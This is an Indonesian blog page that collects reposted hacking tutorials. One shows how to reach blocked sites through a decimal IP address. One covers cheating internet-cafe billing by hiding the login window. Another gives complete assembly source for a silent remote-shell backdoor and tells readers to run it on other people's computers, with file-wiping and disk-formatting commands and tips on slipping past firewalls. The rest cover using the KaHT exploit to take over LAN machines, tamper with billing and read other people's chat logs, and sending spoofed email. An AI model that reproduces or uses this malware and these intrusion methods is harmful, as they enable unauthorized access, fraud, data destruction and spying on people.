Menembus proxy server dengan IP Desimal

assalammu'alaikum wr.wb

UH kPLa qw pucing.. but don;t KhawatIr, Qw ttp akan Sharing dGn tMan2 smua tentang hal2 yg berkaitan dlM dunia ini Tentunya (walaupun Gak Smua), ,

Menembus proxy server dengan IP Desimal (cm5)
Oleh CyberMuttaqin


Ini adalah trik yang ke 5 dari beliau masih dengan tema yang sama untuk menerobos block situs dari ISP maupun warnet, atau kantor anda...
namun dengan trick yang beda...
ini POCnya...

1. Buka cmd
Start >> All Programs >> Accesories >> Command Prompt

2. ketik ping site yang terblock untuk kita lihat ip addressnya...
disini saya mencontohkan http://www.youtube.com
karena ada beberapa isp yang memblog situs ini...

Code: Select all
ping www.youtube.com

maka kita dapat melihat ip addressnya yaitu : 

Code: Select all
208.177.236.70
3. masukkan alamat ini ke

Code: Select all
http://www.allredroster.com/iptodec.htm
untuk kita jadikan desimal :

kita lihat hasilnya ...

Code: Select all
Desimal dari alamat ip 208.177.236.70 adalah HTTP://3497389126

4. Setelah ketemu pindahkan HTTP://3497389126 ke browser kesayangan anda!
dan hasilnya :
bang...

tu situs udah nongol...

5. Ini adalah trick yang bisa anda gunakan selain 4 trick yang lalu...

6. Tunggu post saya selanjutnya masih dengan tema yang sama namun trik yang bedha!

7. Banyak jalan menuju ke Mecca (Doain ane naik haji yee..! ha... ha..)

8. Kritik dan saran slalu beliau tunggu dari jasakomers semua...


Wassalamualaikum

sumber : jasakom

Mencurangi (hampir) Semua Jenis Billing Warnet

assalammu'alaikum wr.wb

yup artikel kali ini akan membahas cara (tittle di atas tu liat kan)...

Artikel ini dibuat oleh seorang newbie dan lamer bernama Blizbs_Uchiha dan ditujukan oleh newbie2 laennya. Buat mas-mas dan om-om yang merasa udah merasa pinter ato udah tau caranya sangat disarankan untuk tidak usah membaca artikel ini karena hanya membuang2 waktu anda yang sangat berharga.

Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!

Penasaran mau tau caranya ? Baca aja sampai habis !
Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah baca, kecuali pengen mati kebosanan (niru kata-kata siapa ya?)

Ini dia caranya ...
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah... udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan

Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.

Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket.
Aku nemunya pas smp tapi baru sekarang kepake ^^
2. Muka bego
3. Mental yang kuat

Langkah-langkahnya:

01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana.
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.

Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.

Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider

CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.

Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhai Tuhan ..
Kalo ketahuan langsung pertebal "muka bego"-mu. Misalnya bilang "Eh, kok jadi gini ya? Kemaren ga gini kok." Ato kata-kata lain, tergantung kreatifitas anda.

Penulis tidak bertanggung jawab atas kerugian yang ditimbulkan atas penggunaan artikel ini (Use at Your Own Risk).

Sumber : jasakom.com

How to make Backdoor and remote it?

assalammu'alaikum wr.wb

Kebanyakan mereka yang udah pada pinter ngebuat tool-tool hacking pada nggak mau bagi-bagi ilmunya, bukan mengajarkan gimana caranya, tapi bagaimana memanfaatkan/menggunakan tool buatannya, bagiku hal ini sangat menyedihkan karena selain membuat kita jadi pasif juga nggak akan menambah kesaktian kita

Sebagai ungkapan rasa terimakasih saya kepada mereka yang sudah rela mengorbankan waktunya untuk berbagi-bagi ilmu baik lewat e-mail, maupun lewat alam mimpi. maka dengan ini saya juga bermaksud untuk berbagi ilmu, tentu khusus bagi yang belum pada tahu aja.

Kali ini saya nggak membahas virus atau keygen, tapi saya akan membahas bagaimana cara membuat program kayak backdoor.

Apa itu backdoor?

Backdoor termasuk salah satu golongan malware atau program berbahaya, kenapa dikatakan berbahaya?, karena dengan backdoor seorang hacker bisa mengendalikan komputer, bisa meremote dari jauh, mencuri data berharga seperti password, pin, data finansial perusahaan bahkan untuk aksi yang fatal, misal: memformat hardisk!.

Cara kerja backdoor

Sesuai namanya cara kerja backdoor cukup sederhana, yaitu dengan cara membukakan pintu belakang dan yang pasti secara diam-diam, pintunya biasanya berupa port, backdoor akan menanti si pembuat backdoor tersebut datang (menghubunginya). Apabila sang pembuat backdoor datang maka backdoor akan membukakan pintu lalu mempersilahkannya masuk dan melindunginya dari pengawasan keamanan, tentu setelah itu hacker (si pembuat backdoor) dapat melakukan apa saja yang dia inginkan dengan leluasa. sangat mengerikan!!

Baiklah dari pada kebanyakan omong, sekarang langsung kita mulai aja tutorialnya.

Sebelum kita memulai experimen ini, sebaiknya kita pelajari dulu teorinya.

Dalam pemrograman jaringan biasanya dibutuhkan yang namanya socket, socket disini maksudnya bukan socket pada jenis-jenis prosesor kayak socket-A, socket 393 atau socket AM2, tapi socket sebagai obyek untuk melakukan pertukaran data (packet) secara byte per byte. begitu juga backdoor, dia juga membutuhkan socket untuk mewujudkan komunikasi. bagi para programmer jaringan, saya yakin pasti dah tahu teori dan cara kerja backdoor ini.

Pada pembuatan backdoor kita harus membuat dua socket, kenapa dua? karena socket tersebut adalah penghubung, misal jika kita ingin ngobrol jarak jauh kita harus pake telpon, si A menelpon si B, maka socket itu bisa kita asumsikan sebagai telpon, dan tidak mungkin komunikasi akan terjadi apabila telponnya cuma satu (cuma si A yang punya telpon), begitu juga dengan socket harus ada dua, yang satu untuk backdoor (server) dan satunya lagi untuk si pembuat backdoor (client).

.data?

sock1 SOCKET ? ; socket pertama [ backdoor ]

sock2 SOCKET ? ; socket kedua [ attacker ]

Setelah itu kita butuh yang namanya port, apa itu port?, berdasarkan wujudnya port dibagikan menjadi dua jenis, port fisik dan port logika, port fisik itu yang bisa kita lihat langsung di belakang komputer, kayak COM1, COM2, USB dll. kalo port logika itu bisa banyak banget, bisa sampai ribuan dan nggak bisa kita lihat, nah port yang akan kita gunakan disini adalah port logika, kalo tadi socket bagaikan telpon maka port bagaikan kabelnya dan IP address bagaikan nomor telponnya, tanpa itu semua komunikasi mustahil terjadi.

Setelah socket tercipta kita akan tentukan port yang akan kita gunakan sebagai jalur komunikasi, pilih port yang masih kosong atau belum kepake, contoh di program ini saya gunakan port 2194. untuk memasang portnya kita harus terlebih dahulu mengisi variabel pada struktur sockaddr_in yang memiliki rangkaian :

sockaddr_in STRUCT

sin_family WORD ?

sin_port WORD ?

sin_addr in_addr <>

sin_zero BYTE 8 dup (?)

sockaddr_in ENDS

diisi dengan cara :

push 2194 ; nomor port yang akan dibuka backdoor

call htons

mov sockaddr_in.sin_port,eax

Setelah struktur sockaddr_in diisi maka langkah selanjutnya adalah binding :

push sizeof sockaddr_in ; Besar struktur soackaddr_in

push offset sockin1 ; alamat sockaddr_in 1

push sock1

call bind ; binding

cmp eax,SOCKET_ERROR ; socket error

jnz socket_oke ; udah ada atau port udah digunakan

xor eax,eax ; null

ret

socket_oke:

mov eax,1

ret

agar lebih jelas lihat source code lengkapnya di bawah ini :

================[ POTONG DISINI ]===================

;==================================================

; SIMPEL BACKDOOR TROJAN

; WRITTEN BY : [4NV|e]

; anvie_2194@yahoo.com

;

; compile with MASM

; ml /c /coff backdoor.asm

; link /subsystem:windows /opt:noref backdoor.obj

;==================================================

.386 ; 32 bit

.model flat,stdcall

option casemap:none

include \masm32\include\windows.inc

include \masm32\include\user32.inc

include \masm32\include\wsock32.inc

include \masm32\include\kernel32.inc

include \masm32\include\winmm.inc

include \masm32\include\shell32.inc

includelib \masm32\lib\user32.lib

includelib \masm32\lib\wsock32.lib

includelib \masm32\lib\kernel32.lib

includelib \masm32\lib\winmm.lib

includelib \masm32\lib\shell32.lib

.data? ; .data section

sock1 SOCKET ? ; socket pertama

sock2 SOCKET ? ; socket kedua

sockin1 sockaddr_in <> ; struktur

sockin2 sockaddr_in <>

s2IP dd ?

wsad WSADATA <> ; WSA struktur

hFile dd ?

hBW dd ?

lenn dd ?

.data

AppName db "AnShell",0

szKonek db "Connected : ",0

szLogon db 13,10

db "______________________________________________",13,10

db " __, WELCOME TO : ",13,10

db " | | ___, . __ . . ",13,10

db " |__| ,__ (____ |__ / / | | ",13,10

db " | | | | ,____) | ) \/__ |__ |__ ",13,10

db 13,10

db " By:[4NV|e] ",13,10

db " this stuff is for education purpose only ",13,10

db " Source : www.jasakom.com ",13,10

db "______________________________________________",13,10

db 0

szMasuk db "[ You already entered system ]",13,10

szPerintah db "Command : ",0

szSelesai db 13,10," - thanks for visiting",13,10

db " - [4NV|e]",13,10

db " - anvie_2194@yahoo.com",13,10

db " - www.anvie.net.tc",0

szSocketError db "shit, socket error",0 ;what the fuck!

szPerintahX db "Command not found.",13,10,0

szKosong db 13,10

szOpen db "Open",0

; perintah-perintah

Perintah1 db "msgbox",0

Perintah2 db "close",0

Perintah3 db "shell",0

Buffer db 512 dup(0) ; buffer

Buffer2 db 512 dup(0) ; buffer

KeepOF dd 0 ; buat jaga-jaga biar gak terjadi buffer overflow

.code ; .code section

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

StartUp proc ; prosedur awal pembuatan socket

push offset wsad

push 0101h

call WSAStartup

push 0

push SOCK_STREAM

push PF_INET

call socket ; buat socket utama (server? :P)

; backdoor!

mov sock1,eax

mov ax,AF_INET

mov sockin1.sin_family,ax

xor eax,eax

mov sockin1.sin_addr,eax

push 2194

call htons ; Buka port 2194 (Lucky Number ;)

mov sockin1.sin_port,ax ; masukin port ke struktur sockaddr_in

mov eax,sizeof sockaddr_in

push eax

push offset sockin1

push sock1

call bind

cmp eax,SOCKET_ERROR ; apakah socket oke ?

jnz socket_oke

xor eax,eax ; tidak, return 0

ret

socket_oke: ; oke, yeah return 1

mov eax,1

ret

StartUp endp

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

BersihkanBuffer proc uses edi lpBuffer WORD,jml WORD

xor al,al ; Isi buffer jadikan nul byte

mov edi,lpBuffer ; dibutuhkan di lingkungan assembly

mov ecx,jml

rep stosb ; mnemonik stosb mengeset alamat edi

; dengan nilai dari eax

ret

BersihkanBuffer endp

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

Tarjim proc lpCommand WORD ; prosedur untuk menerjemahkan perintah

LOCAL lBuffer[512]:BYTE ; untuk dieksekusi.

LOCAL arg WORD

LOCAL arg2 WORD

push lpCommand

call lstrlen

cmp eax,2

jne perintah_ok

ret

perintah_ok:

lea edi,lBuffer

push edi ; selamatkan edi ke stack

;

push 512

push edi ; bersihkan lBuffer

call BersihkanBuffer

mov edi,lpCommand

mov al,020h ; cari byte 20h dimana 20h=karakter spasi

mov ecx,512 ; simpel deteksi argumen

repnz scasb ; cari!

dec edi

test ecx,ecx ; apakah karakter spasi ditemukan?

jnz cmd_ok ; jika ya goto cmd_ok

mov edi,lpCommand

mov al,0dh ; jika tidak, cari karakter enter (0dh/13)

mov ecx,512

repnz scasb

dec edi

mov byte ptr [edi],0 ; jika ketemu set null byte

jmp no_arg ; argumen tidak ada goto no_arg

cmd_ok:

mov byte ptr [edi],0 ; nullkan karakter spasi

inc edi

mov arg,edi ; simpan argumen pertama

push edi

call lstrlen

add edi,eax

sub edi,2 ; nullkan 2 byte terkahir maksud 2 byte terakhir

mov word ptr [edi],00 ; disini adalah 0ah 0dh (enter)

no_arg:

pop edi ; kembalikan edi dari stack

push lpCommand

push edi

call lstrcpy ; kopikan string perintah ke buffer

push offset Perintah1

push edi

call lstrcmpi ; compare string insensitive

or eax,eax

jz msgbox ; apakah perintah msgbox ?

push offset Perintah2

push edi

call lstrcmpi

or eax,eax ; apakah perintah close ?

jz mati

push offset Perintah3

push edi

call lstrcmpi

or eax,eax ; apakah perintah shell ?

jz shell

xor eax,eax ; perintah gak ada yang cocok

ret ; kembali dan tampilkan pesan

msgbox:

mov eax,MB_OK

or eax,MB_SYSTEMMODAL

or eax,MB_TOPMOST

push eax

push offset AppName

push arg

push 0

call MessageBox

jmp retCmd

mati:

push offset szSelesai

call lstrlen

mov lenn,eax

; tampilkan pesan selesai

push 0

push lenn

push offset szSelesai

push sock2

call send

; tutup socket

push sock1

call closesocket

push sock2

call closesocket

; bersihkan memori

call WSACleanup

xor eax,eax

push 0

call ExitProcess

shell:

; cari untuk argumen ke 2 atau sub commandline

mov arg2,0

mov edi,arg

mov ecx,512

mov al,20h ; 20h = spasi

repnz scasb

cmp ecx,0 ; spasi ditemukan ?

je no_arg2 ; jika tidak goto no_arg2

dec edi

mov byte ptr [edi],0 ; ada, nullkan

inc edi

mov arg2,edi ; simpan arg2 ke memori

no_arg2:

push 1

push 0

push arg2

push arg

push offset szOpen

push 0

call ShellExecuteA ; eksekusi!

jmp retCmd

retCmd:

mov al,1

ret

Tarjim endp

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

start:

call StartUp ; panggil prosedur startup

test eax,eax ; apakah socket oke?

jz socket_error ; jika tidak socket = error

; socket dah oke

; buat listening ke port 2194

push 1

push sock1

call listen

new_session:

push sock2 ; tutup socket 2

call closesocket ; berfungsi setelah looping

mov eax,sizeof sockaddr_in

mov lenn,eax

push offset lenn

push offset sockin2

push sock1

call accept ; menunggu perintah dari socket 2

mov sock2,eax ; simpan alamat socket 2

push offset szLogon

call lstrlen

mov lenn,eax

push 0

push lenn

push offset szLogon

push sock2

call send ; sambut tamu dari luar  

mov eax,sockin2.sin_addr

push eax

call inet_ntoa ; terjemahkan IP x.x.x.x

mov s2IP,eax ; simpan IP dari socket 2

push offset szKonek

push offset Buffer

call lstrcpy

lea edi,Buffer

push edi

or ecx,-1

mov al,03Ah ; cari karakter ':'

repnz scasb

inc edi

; tempelkan string IP

push s2IP

push edi

call lstrcpy

push edi

call lstrlen

add edi,eax

mov word ptr [edi],0a0dh ; ganti baris

add edi,2

mov byte ptr [edi],0 ; null

pop edi

push edi

call lstrlen

mov lenn,eax

push 0

push lenn

push offset Buffer

push sock2

call send ; tampilkan string Connected : x.x.x.x -> IP address

push 0

mov eax, sizeof szMasuk

push eax

push offset szMasuk

push sock2

call send ; welcome  

perintah:

push 0

push 10

push offset szPerintah

push sock2

call send ; backdoor siap dikendalikan!

push 512

push offset Buffer2

call BersihkanBuffer ; Bersihkan buffer

lea edi,Buffer2

mov KeepOF,0 ; counter anti buffer overflow

tunggu_perintah:

invoke recv,sock2,edi,500,0

test eax,eax

jz new_session

cmp eax,SOCKET_ERROR

je new_session

add edi,eax

inc KeepOF

cmp KeepOF,511

jb no_of ; jika penuisan buffer hampir mencapai 512 byte

jmp perintah ; bersihkan buffer, jaga2 biar gak terjadi

no_of: ; Buffer overflow :-)

cmp byte ptr [edi-1],08h

jne bkn_backs

xor eax,eax

mov word ptr [edi],ax

sub edi,2

bkn_backs:

cmp byte ptr [edi-1],0ah ; apakah tombol enter yang ditekan ?

jnz tunggu_perintah ; jika nggak masih nunggu perintah

; ya, terjemahkan perintah

push offset Buffer2

call Tarjim ; panggil prosedur tarjim

test eax,eax ; apakah perintah valid

jnz perintah ; jika tidak balik tungu perintah

cmp eax,2 ; apakah perintah kosong ?

je kosong ; jika ya, goto kosong

push 0

mov eax,sizeof szPerintahX

push eax

push offset szPerintahX

push sock2

call send ; tampilkan pesan kalo perintah nggak ada

jmp perintah

kosong:

push 0

push 2

push offset szKosong

push sock2

call send ; hanya ganti baris

jmp perintah

socket_error: ; trap handel jika-jika socket error

push MB_ICONERROR

push offset AppName

push offset szSocketError

push 0

call MessageBox ; tampilkan kesalahan

tamat:

push 0

call ExitProcess ; selesai.

end start

================[ EOF ]=========================================

atau kalo males ngompilasi sendiri, ini contoh yang udah jadi:

download aja,,

kalo udah coba test hasilnya, jalankan backdoor.exe dikomputer target, misal komputer teman, kantor, warnet (komputer operator lho) atau komputer pribadi, backdoor ini saya desain silent jadi kamu gak bakalan nemuin jendela macam-macam, tapi kalo kamu pake firewall pasti akan ketahuan kalo backdoor.exe telah membuka port.

setelah langkah diatas selesai kita akan melakukan telnet ke komputer target, kita bisa pake komputer lain, untuk menjalankan telnet caranya klik start>run> ketik “cmd” tanpa tanda kutip. setelah itu akan tampil jendela konsol seperti gambar 01:

Gambar 01

pada jendela konsol ketikkan “telnet x.x.x.x 2194” tanpa tanda kutip, x.x.x.x disini maksudnya IP target, contoh “telnet 192.168.0.3 2194”, 2194 disini maksudnya port yang akan kita masuki (untuk contoh backdoor ini aku gunakan port 2194). contoh Gambar 02

Gambar 02

tekan “Enter” kalo telnet berhasil maka akan tampil seperti Gambar 03 berikut:

Gambar 03

nah kalo dah gitu kita udah bisa mengendalikan komputer target dari jarak jauh, maksud seperti contoh gambar diatas adalah backdoor sudah siap melakukan perintah, ada 3 perintah yang dikenal oleh backdoor ini :

1. msgbox (untuk menampilkan pesan ke komputer target)
2. shell (untuk menjalankan aplikasi di komputer sasaran)
3. close (untuk menutup hubungan dan mematikan backdoornya)

perintah diatas bisa ditambah sendiri tergantung kreatifitas kamu.

backdoor bisa menyenangkan jika digunakan untuk mengerjai temen yang lagi ol .

cara menjalankan perintah cukup ketikkan perintah diatas pada jendela konsol, misal kita akan menampilkan pesan ke komputer target, tinggal ketikkan:

“msgbox hallo, komputer kamu dibawah kendaliku” tanpa tanda kutip, maka pada komputer target akan muncul jendela box seperti contoh Gambar 04:

Gambar 04

atau ingin memainkan musik ke komputer target dengan catatan kita tahu tempat musik yang akan kita mainkan, contoh:

“shell d:\musik ku\dream theater – endless sacrifice.mp3”

maka dikomputer target akan memainkan musik yang merdu.

atau ingin mematikan komputer target yang berbasis Wind**s 2000 keatas, dengan cara:

“shell shutdown –s –t 0 –f”

untuk merestart tinggal ganti “-s” jadi –“r” contoh:

“shell shutdown –r –t 0 –f”

Backdoor bisa menjadi sangat berbahaya jika yang dijalankan adalah perintah-perintah seperti:

“shell del /f /q /s c:\*.*” (perintah untuk menghapus semua data tanpa konfirmasi)

“shell format d: /q” (perintah untuk memformat hardisk)

note: mohon agar contoh program backdoor ini tidak digunakan untuk tindakan-tindakan yang merusak.

setelah selesai menggunakan backdoor kita bisa tutup dengan mengetikkan perintah “close”, maka backdoor di komputer target akan bunuh diri.

Cara di atas akan sia-sia apabila komputer target memasang firewall, kita perlu menambahkan kode anti firewall detection untuk menghindari deteksi dari firewall. kode anti firewall detection yang saya ketahui adalah dengan cara tehnik runtime process infection, dimana kita akan menginjeksi kode backdoor ke tubuh firewall (hampir mirip kayak DLL injection) yang sedang resident lalu meremote-nya misal pake API CreateRemoteThread, sehingga firewall akan mengangapnya sebagai sumber yang dipercaya, karena nggak mungkin firewall mencurigai dirinya sendiri sebagai backdoor :”D, Adapun beberapa firewall yang vulnerable terhadap serangan ini adalah:

1. Zone Alarm 4

2. Zone Alarm Pro 4

3. BlackIce 3

Pada pengujian yang saya lakukan, ke tiga firewall tersebut diatas bisa ditembus sistem keamanannya dan berhasil menjalankan backdoor tanpa gangguan, tapi entahlah untuk jenis firewall lain, karena saya cuma menguji 3 firewall diatas. :P

Untuk menambahkan tehnik ini kamu perlu pengetahuan dan dasar-dasar pemrograman yang cukup.

Last word

Saya hanyalah seorang biasa yang masih sangat awam dibidang IT, jadi mohon ma’af apabila saya telah melakukan kesalahan yang mungkin disebabkan karena ketidakpahaman saya atau kebodohan saya.

Untuk yang udah pada ahli, jangan pelit bagi-bagi ilmu ya..

Sumber :jasakom.com

Cara masuk ke DOS pada Windows XP yang serba dikunci

assalammu'alaikum wr.wb

"bagai kancil dalam ember (apan tu?) kagak bisa peribahasa diem, gembk tu harimau ..!!",  hari gene masih Banyak warnet yang membatasi akses gerak kita di Windows seperti fasilitas DOS, WIndows Explorere, setting dan sebagainya dalam keadaan tidak dapat kita semtuh, huh, emang nyebelin kalo kita bener-bener perlu akses ini :) Gini caranya:

Cara masuk di DOS pada Windows XP yang serba di lock fasilitasnya :
1. Pada icon dalam dektop atau start menu di klik kanan, lalu pilih properties

2. Di properties pilihlah "find target..."

3. Muncul Window lalu pilih search diatas
4. Pada Search pilihlah "All Files and folders"
5. Lalu cari file "cmd.exe" di windows
6. Jika di temukan maka jalankan file cmd.exe.
7. Dengan menjalankan file cmd.exe maka anda telah masuk ke dos :)

Jika ternyata penguncian benar-benar total maka anda dapat mengubah registry windows melalui pembuatan file *.reg dengan notepad / word pad, kemudian anda jalankan file *.reg tersebut, cara untuk membuatnya ada dihalaman ini juga.

Tujuan dari tutorial ini agar warnet-warnet yang membatasi hak akses user terlalu keras dan banyak dimana membuat pusing para usernya yangin masuk DOS, Find dan sebagainya.

Sumber : Yogya Family Code

Cara masuk di komputer lain lewat DOS (Windows XP / 2000)

assalammu'alaikum wr.wb

Anda ingin masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya ada disini.

Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu

internet Maniac (Internet Maniac.exe) ... Download Interenet Maniac
Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname

KaHT (KaHt.exe) ... Download program hacker KaHT
Berfungsi sebagai program untuk menerobos ke computer server atau client

Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe

Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara.

Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe
Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pakek WINZIP atau pakek apa.
Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara.

Untuk Windows XP
Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan.

Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini) :)
Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul
(Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja)

Setelah kamu dapetin sasaran computer yang mau di masukin / diremote maka kamu langsung aja kamu jalankan program Internet Maniac

Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki.

Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat.

Cara masuk DOS Mode
Untuk Windows XP :
Masuklah ke Start, All programs, Accessories lalu Command Prompt
Untuk Windows 95/98/Me/NT/2000
Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt

Setelah berhasil masuk DOS maka masuklah di directory program KaHN, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:\KaH) maka ketikkan “CD\KaHT” dan seterusnya.

Jika sudah, ini saatnya…

Ketikkan “KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran.
kalau bingung bisa begini : "KaHT Ip1 ip2"
ip1 : ip awal yang discan
ip2 : ip terahkir yang discan

Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho.
Maka ketikkan saja “KaHT 192.168.0.0 192.168.0.1” lalu enter aja
Nah disini nanti program akan bekerja otomatis.
Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di "c:\windows\system" milik komputer tujuan / sasaran setelah pen-scan-an selesai.
Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe

Nah kalo udah begini kita bisa berkreasi :

Pingin biaya warnet kita lebih murah ? gampang masuk aja di billing server, ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan ama operator warnetnya, hehe.

Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:\Program Files\MiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat “/logs” maksudnya kalau tadi di C:\program Files\MiRC program MiRCnya maka cukup masuk aja di C:\Program Files\MiRC\Logs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan.

Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehe.

Diatas cuman kreasi dikit aja, kamu bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas

Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab..

Sumber : Yogya Family Code

Mengirim e-mail dengan identitas orang lain

assalammu'alaikum wr.wb

Memang dunia e-mail udah sering menjadi sasaran para cracker, seperti bomber, hack e-mail, memasang keylogger di komputer untuk melihat username, password dan sebagainya. Salah satu yang menjengkelkan adalah jika kita mendapat e-mail yang dimana pengirimnya bukan pemilik e-mail tersebut, repotkan ? sebenarnya untuk mengetahui palsu tidaknya e-mail dapat kita lihat tulisan setelah jamnya, misal:

Jika pada e-mail pengirim muncul, 04 Dec 2004 09:14:01 +0700 ->> lihat setelah pada jamnya, jadi asli tuh, kalau palsu munculnya gini 04 Dec 2004 09:15:14 -0000 ->> kalau ini palsu karena "-0000", pokoknya yang pakek "-0000" adalah 99% palsu itu email. pahamkan ?

Kalau mau diuji coba silahkan download file ZIP yang isinya file PHP dimana disitu udah ada form sama sourcenya yang dah siap dijalanin buat ngirim e-mail palsu.

Sumber : Yogya Family Code